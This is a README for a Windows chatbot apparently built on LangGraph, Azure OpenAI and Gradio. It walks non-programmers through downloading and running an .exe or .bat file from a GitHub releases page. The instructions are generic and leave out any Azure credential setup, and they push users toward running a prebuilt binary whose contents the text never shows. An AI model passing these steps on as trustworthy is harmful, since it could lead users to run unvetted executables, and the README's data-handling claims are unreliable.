This is an easy-to-use chatbot built with LangGraph, Azure OpenAI, and Gradio. It lets you ask questions and get helpful answers through a simple web interface. The chatbot works well with PDF documents and supports conversations related to AI agents and Python skills. It aims to provide an educational experience without needing programming knowledge.
The app runs on Windows and uses modern Python tools behind the scenes. You will interact with it like a normal web page, but it runs locally on your computer for privacy and speed.
This guide will help you download and run the chatbot on your Windows PC. You do not need to know programming or install any complex software.
- Windows 10 or later (64-bit recommended)
- At least 4 GB of RAM
- Internet connection (required for Azure OpenAI services)
- 500 MB of free disk space for installation and data
- Modern web browser like Chrome, Edge, or Firefox
Start by visiting the release page to get the software. This is the official place where new versions are published.
To download the app:
- Click the link above or go to this URL in your browser: https://github.com/Gfake-tech/python-langgraph-chatbot/releases
- Look for the latest version in the list. The newest release is at the top.
- Find the Windows installer or zip file. The file usually ends with
.exefor easy installation or.zipif you want the portable version. - Click the file name to download it. Your browser will save it to your Downloads folder or the location you chose.
If you downloaded an .exe file:
- Find the downloaded file in your Downloads folder.
- Double-click the file to start the installer.
- Follow the instructions on screen. You can choose the default settings.
- Wait for the installation to complete.
- Once done, look for the "python-langgraph-chatbot" icon on your desktop or Start menu.
- Click the icon to launch the app.
If you downloaded a .zip file:
- Find the
.zipfile in your Downloads folder. - Right-click it and choose "Extract All..."
- Select a destination folder where you want to save the files.
- After extraction, open the folder with the new files.
- Double-click
start-chatbot.bator the executable file named similarly to run the chatbot.
Once the chatbot is running, your web browser will open to a simple page.
- You type your questions in the box.
- Press Enter or click Send.
- The chatbot responds below instantly.
- You can upload PDF documents to ask specific questions about them.
- The bot remembers your conversation during your session.
The interface is clean and easy to use. It does not require commands or special knowledge. Just type naturally.
If something does not work:
- Make sure your internet connection is active.
- Check that you have the latest version installed.
- Restart the app by closing and opening it again.
- Close other applications that might slow down your PC.
- If the browser does not open automatically, try opening this address manually:
http://localhost:7860
- Chat with an AI powered by LangGraph and Azure OpenAI
- Support for PDF document uploads and Q&A
- Clean and simple web interface via Gradio
- Runs locally on Windows with no programming needed
- Handles conversations on AI agents and Python topics
- Easy installation with a friendly setup process
- Visit the download page: https://github.com/Gfake-tech/python-langgraph-chatbot/releases
- Repository homepage: https://github.com/Gfake-tech/python-langgraph-chatbot
- Support and issues page: https://github.com/Gfake-tech/python-langgraph-chatbot/issues
Q: Do I need Python installed?
No. The app comes bundled with everything it needs to run.
Q: Is my data shared?
Your questions are sent to Azure OpenAI servers for answers, but no personal data is stored by the app.
Q: Can I use the chatbot offline?
No. It requires internet access to connect to the AI services.
Q: How do I update the app?
Download the latest version from the releases page and install it over your current version.